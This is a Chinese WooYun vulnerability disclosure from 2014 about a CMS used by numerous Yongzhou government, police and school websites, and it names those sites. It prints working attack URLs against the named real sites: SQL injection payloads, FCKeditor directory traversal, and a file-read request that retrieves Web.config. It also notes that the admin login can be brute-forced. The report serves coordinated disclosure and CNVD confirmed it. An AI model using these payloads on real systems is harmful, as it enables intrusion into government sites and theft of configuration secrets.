当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-085721

漏洞标题:某CMS漏洞影响多个政府网站

相关厂商:cncert

漏洞作者: 淡蓝色の忧伤

提交时间:2014-12-08 18:29

修复时间:2015-01-22 18:30

公开时间:2015-01-22 18:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-08: 细节已通知厂商并且等待厂商处理中
2014-12-12: 厂商已经确认,细节仅向厂商公开
2014-12-22: 细节向核心白帽子及相关领域专家公开
2015-01-01: 细节向普通白帽子公开
2015-01-11: 细节向实习白帽子公开
2015-01-22: 细节向公众公开

简要描述:

是叫qcms 或者灵动管理系统,我也不知道到底叫什么

详细说明:

http://www.yzsgaj.gov.cn 永州市公安局
http://ll.yzsgaj.gov.cn 永州市公安局
http://www.yzglj.com/ 永州市公路局
http://www.ninyuan.gov.cn/ 宁远县政府
http://www.qy.gov.cn/ 祁阳政府网
http://www.yzsgjj.gov.cn/ 永州市住房公积金管理中心
http://www.dx.gov.cn/ 道县政府
http://sjj.dx.gov.cn/ 道县审计局
http://www.lst.gov.cn 冷水滩区政府
http://www.cnll.gov.cn 零陵
http://jsw.lanshan.gov.cn/ 蓝山县
http://da.yzsgaj.gov.cn 东安县公安局
http://www.lanshan.gov.cn 蓝山县
http://www.axdjw.gov.cn 安西
带个医院
http://www.yzjy.net:8080/
学校
http://xsgygl.xmut.edu.cn 厦门理工
http://www.cdfxds.com/ 四川大学附属实验小学东山学校
经测试部分网站注入1跳转到404页面,
注入2都可以
注入 1
cmsfile/extends/link/ajax.aspx?parentList=parentList&pid=&time=1417509866303
Pid参数未过滤
永州公路局
http://www.yzglj.com/cmsfile/extends/link/ajax.aspx?parentList=parentList&pid=&time=1417509866303

图片1.png


零陵区政府
http://www.cnll.gov.cn/cmsfile/extends/link/ajax.aspx?parentList=parentList&pid=&time=1417509866303

图片2.png


注入 2
cmsfile/ajaj/content.aspx?oper=ajaxViewCount&id=&cType=article&time=1417509887642
Id
好多站都有waf 但是有注入就是有注入
道县为例
http://www.dx.gov.cn/cmsfile/ajaj/content.aspx?oper=ajaxViewCount&id=convert%28int,user%29&cType=article&time=1417509887642

图片3.png


http://www.yzglj.com/cmsfile/ajaj/content.aspx?oper=ajaxViewCount&id=convert%28int,user%29&cType=article&time=1417509887642Id
永州公路局

图片4.png


3.后台fck编辑器,不过test页面删的干干净净。。。
但是还是有一个目录遍历
http://ll.yzsgaj.gov.cn/cmsfile/fckeditor//editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../..%2f
好像目录遍历也不是太危险。。但是下面还有

图片5.png


4.本地文件包含,读取任意文件
Ps:配合目录遍历O(∩_∩)O~
http://ll.yzsgaj.gov.cn/cmsfile/ajaj/readjson.aspx?file=../../Web.config

图片6.png


5.后台可爆破

图片7.png

图片8.png


奇葩的是你验证码不更新(两次验证码一样),那还弄个验证码干嘛?
6.疑似注入/web/Default.aspx
http://www.dx.gov.cn/web/Default.aspx
应该能bypass,虽然我没找对姿势

图片9.png

漏洞证明:

图片1.png


图片2.png


图片6.png

修复方案:

没你们懂。。。。。

版权声明:转载请注明来源 淡蓝色の忧伤@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-12-12 19:34

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。

最新状态:

暂无


漏洞评价:

评论